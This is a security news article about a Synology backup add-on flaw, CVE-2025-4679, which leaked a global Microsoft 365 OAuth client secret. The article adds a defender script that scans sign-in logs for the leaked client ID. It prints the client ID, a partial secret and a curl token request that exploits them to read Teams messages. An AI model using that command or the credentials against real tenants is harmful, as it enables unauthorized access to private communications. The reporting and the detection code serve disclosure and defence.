A vulnerability in Synology’s “Active Backup for Microsoft 365” (ABM) add-on allowed unauthorized access to sensitive Microsoft 365 tenant data, including private Teams messages and group communications.
Discovered by security firm ModZero during a red-team engagement, the flaw (CVE-2025-4679) stemmed from a leaked client credential exposed during the ABM setup process.
This credential, belonging to Synology’s global app registration, enabled attackers to bypass authentication and access organizational data across all ABM installations without a prior foothold.
Technical Exploit Mechanism
The vulnerability originated in Synology’s OAuth middleware (synooauth.synology.com), which mishandled redirects during ABM setup.
Specifically, the HTTP 302 redirect response included Synology’s global client_secret in plaintext:
Location: [...]/activebackupoffice365-cgi.cgi?action=oauth&client_secret=ARI8Q%7EsHOuwMoX.[...]
This credential (client_id: b4f234da-3a1a-4f4d-a058-23ed08928904, client_secret: ARI8Q~sHOuwMoX.) could be used in the OAuth client credentials flow to generate access tokens for the Microsoft Graph API:
curl -X POST https://login.microsoftonline.com/<TENANT_ID>/oauth2/v2.0/token \
-d "grant_type=client_credentials" \
-d "client_id=b4f234da-3a1a-4f4d-a058-23ed08928904" \
-d "client_secret=ARI8Q%7EsHOuwMoX.[...]" \
-d "scope=https://graph.microsoft.com/.default"
Successful exploitation granted application permissions Group.Read.All and ChannelMessage.Read.All, enabling access to:
- All Microsoft Teams channel messages (public/private)
- Organizational group memberships and content
- Embedded media and cards within Teams.
Impact and Attack Vectors
With over 1.2 million ABM installations, the flaw created a supply-chain backdoor into organizations’ Microsoft tenants.
Attackers could:
- Harvest credentials for phishing/social engineering
- Extract sensitive communications for espionage
- Prepare ransomware attacks through Teams reconnaissance
Critical infrastructure sectors were particularly vulnerable, as exploitation required only a one-time interception of the leaked credential, with no prior foothold in the tenant needed.
ModZero confirmed the credentials' validity across multiple tenants, including a client environment where they had only guest-level access before the discovery.
Disclosure Controversy
Synology initially downplayed the flaw’s severity, assigning CVSS 6.5 (Moderate) versus ModZero’s 8.6 (High) assessment.
Their advisory vaguely described the issue as allowing “authenticated attackers to obtain sensitive information,” omitting technical specifics and cloud-scale impact. Despite ModZero providing:
- Full proof-of-concept
- Indicators of compromise (IoC)
- Requests for transparent customer notification
Synology published minimal guidance and no evidence of user alerts.
Organizations using ABM should audit sign-in logs for the client ID b4f234da-3a1a-4f4d-a058-23ed08928904 and monitor Graph API requests for anomalous Teams data access.
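A defender-side check for the audit recommended above, added here as an example and not code from the original report or from Synology: it scans an exported list of Entra ID sign-in records for the leaked client ID and alerts on any source address outside the organisation's own NAS egress range. Field names follow the Microsoft Graph signIn resource; the sample records and the egress range are constructed.

```python
"""Scan exported Entra ID sign-in records for use of the leaked ABM client ID.

Added example, not from the original article or Synology. Field names follow
the Microsoft Graph signIn resource (appId, createdDateTime, ipAddress,
resourceDisplayName); sample records and the NAS egress range are constructed.
"""
import json
from ipaddress import ip_address, ip_network

# Client ID of Synology's global ABM app registration, as quoted in the article.
LEAKED_CLIENT_ID = "b4f234da-3a1a-4f4d-a058-23ed08928904"

# Constructed export: three service-principal sign-ins in Graph signIn shape.
SAMPLE_EXPORT = json.dumps([
    {"appId": LEAKED_CLIENT_ID, "createdDateTime": "2025-06-02T01:15:00Z",
     "ipAddress": "203.0.113.10", "resourceDisplayName": "Microsoft Graph"},
    {"appId": LEAKED_CLIENT_ID, "createdDateTime": "2025-06-02T03:41:12Z",
     "ipAddress": "198.51.100.77", "resourceDisplayName": "Microsoft Graph"},
    {"appId": "11111111-2222-3333-4444-555555555555",
     "createdDateTime": "2025-06-02T04:00:00Z",
     "ipAddress": "198.51.100.77", "resourceDisplayName": "Microsoft Graph"},
])


def find_suspicious_signins(export_json, trusted_egress):
    """Return (reason, record) pairs for every sign-in using the leaked client ID.

    trusted_egress: CIDR ranges the organisation's own NAS reaches Microsoft
    from (constructed allow-list). Other sources raise an alert; sign-ins from
    the trusted range are still reported, because the secret is global and an
    attacker's token request looks identical to the NAS's by app ID alone.
    """
    nets = [ip_network(n) for n in trusted_egress]
    findings = []
    for rec in json.loads(export_json):
        if rec.get("appId") != LEAKED_CLIENT_ID:
            continue
        src = ip_address(rec["ipAddress"])
        if any(src in n for n in nets):
            findings.append(("info: leaked client ID used from trusted NAS egress", rec))
        else:
            findings.append(("alert: leaked client ID used from untrusted source", rec))
    return findings


def summarize(findings):
    """Count alerts versus informational hits for a one-line triage summary."""
    alerts = sum(1 for reason, _ in findings if reason.startswith("alert"))
    return {"alerts": alerts, "info": len(findings) - alerts}
```

Run it against a real export by replacing SAMPLE_EXPORT with the JSON returned for the tenant's service principal sign-ins and the allow-list with the NAS's actual egress ranges.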
This incident underscores third-party risk in cloud ecosystems, where a single leaked credential can compromise entire digital estates.